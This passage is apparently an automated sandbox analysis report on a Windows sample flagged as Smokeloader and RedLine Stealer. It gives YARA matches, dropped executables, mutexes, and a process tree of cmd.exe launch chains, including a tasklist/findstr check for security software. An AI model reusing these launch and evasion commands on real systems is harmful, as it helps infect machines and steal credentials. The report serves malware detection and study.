Source: file.exe, 00000000.00000002.2441684437.000000006C762000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenamesOdilesigo@ vs file.exe

Uses 32bit PE files

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 00000000.00000002.2419937353.0000000002600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.2420085269.00000000026BD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000002E.00000002.2853783541.00000000026E0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000016.00000002.2778148129.00000000027BD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000016.00000002.2769315427.00000000026F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000002E.00000002.2853503959.00000000026A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: file.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: random[1].exe.19.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ba77748b9b.exe.19.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: random[1].exe.0.dr	Static PE information: Section: ZLIB complexity 0.9973284230245232
Source: random[1].exe.0.dr	Static PE information: Section: etmksbbt ZLIB complexity 0.9945282549395459
Source: RoamingBKKFHIEGDH.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9973284230245232
Source: RoamingBKKFHIEGDH.exe.0.dr	Static PE information: Section: etmksbbt ZLIB complexity 0.9945282549395459
Source: enter[1].exe.0.dr	Static PE information: Section: ZLIB complexity 0.999877262636612
Source: enter[1].exe.0.dr	Static PE information: Section: owfltkii ZLIB complexity 0.9940620272314675
Source: RoamingAEGIJKEHCA.exe.0.dr	Static PE information: Section: ZLIB complexity 0.999877262636612
Source: RoamingAEGIJKEHCA.exe.0.dr	Static PE information: Section: owfltkii ZLIB complexity 0.9940620272314675
Source: axplong.exe.5.dr	Static PE information: Section: ZLIB complexity 0.9973284230245232
Source: axplong.exe.5.dr	Static PE information: Section: etmksbbt ZLIB complexity 0.9945282549395459
Source: explorti.exe.8.dr	Static PE information: Section: ZLIB complexity 0.999877262636612
Source: explorti.exe.8.dr	Static PE information: Section: owfltkii ZLIB complexity 0.9940620272314675

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@100/171@31/20

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C737030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

0_2_6C737030

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004190A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_004190A0

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\CFKWDMI0.htm

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5644:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1716:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3144
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6788:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4836:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess616

Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe

File created: C:\Users\user\AppData\Local\Temp\44111dbc49

Jump to behavior

Source: C:\Users\user\1000003002\ead6a72944.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\7366.tmp\7367.tmp\7368.bat C:\Users\user\1000003002\ead6a72944.exe"

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe, 00000000.00000002.2441347457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2430601364.000000001CBA9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: file.exe, 00000000.00000002.2441347457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2430601364.000000001CBA9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2441347457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2430601364.000000001CBA9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2441347457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2430601364.000000001CBA9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: file.exe, file.exe, 00000000.00000002.2441347457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2430601364.000000001CBA9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2441347457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2430601364.000000001CBA9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2441347457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2430601364.000000001CBA9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000000.00000003.2115692491.0000000022C85000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2116022880.0000000002797000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2095025056.0000000022C69000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2441347457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2430601364.000000001CBA9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: file.exe, 00000000.00000002.2441347457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2430601364.000000001CBA9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: RoamingBKKFHIEGDH.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: RoamingAEGIJKEHCA.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingBKKFHIEGDH.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe "C:\Users\user\AppData\RoamingBKKFHIEGDH.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingAEGIJKEHCA.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe "C:\Users\user\AppData\RoamingAEGIJKEHCA.exe"
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 616 -s 2504
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe "C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe"
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe "C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe"
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Ruth Ruth.cmd & Ruth.cmd & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe "C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe"
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3144 -s 1040
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\1000003002\ead6a72944.exe "C:\Users\user\1000003002\ead6a72944.exe"
Source: C:\Users\user\1000003002\ead6a72944.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\7366.tmp\7367.tmp\7368.bat C:\Users\user\1000003002\ead6a72944.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2476 --field-trial-handle=2404,i,6116549712235558753,12862378424519255312,262144 /prefetch:8
Source: unknown	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=2072,i,12084099025757561661,8900613295013787749,262144 /prefetch:3
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://www.youtube.com/account
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2932 --field-trial-handle=2680,i,8259539397810858714,2629132827171544738,262144 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe "C:\Users\user\AppData\Local\Temp\1000028001\build2.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe "C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2240 -parentBuildID 20230927232528 -prefsHandle 2124 -prefMapHandle 2140 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5bf760f3-4a16-4712-bdf3-1a7919266e26} 7092 "\\.\pipe\gecko-crash-server-pipe.7092" 26181e6b310 socket
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6684 --field-trial-handle=2680,i,8259539397810858714,2629132827171544738,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingBKKFHIEGDH.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingAEGIJKEHCA.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe "C:\Users\user\AppData\RoamingBKKFHIEGDH.exe"	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe "C:\Users\user\AppData\RoamingAEGIJKEHCA.exe"	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe "C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe"
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\1000003002\ead6a72944.exe "C:\Users\user\1000003002\ead6a72944.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe "C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe "C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe "C:\Users\user\AppData\Local\Temp\1000028001\build2.exe"
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Ruth Ruth.cmd & Ruth.cmd & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Users\user\1000003002\ead6a72944.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\7366.tmp\7367.tmp\7368.bat C:\Users\user\1000003002\ead6a72944.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2476 --field-trial-handle=2404,i,6116549712235558753,12862378424519255312,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=2072,i,12084099025757561661,8900613295013787749,262144 /prefetch:3
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2240 -parentBuildID 20230927232528 -prefsHandle 2124 -prefMapHandle 2140 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5bf760f3-4a16-4712-bdf3-1a7919266e26} 7092 "\\.\pipe\gecko-crash-server-pipe.7092" 26181e6b310 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2932 --field-trial-handle=2680,i,8259539397810858714,2629132827171544738,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
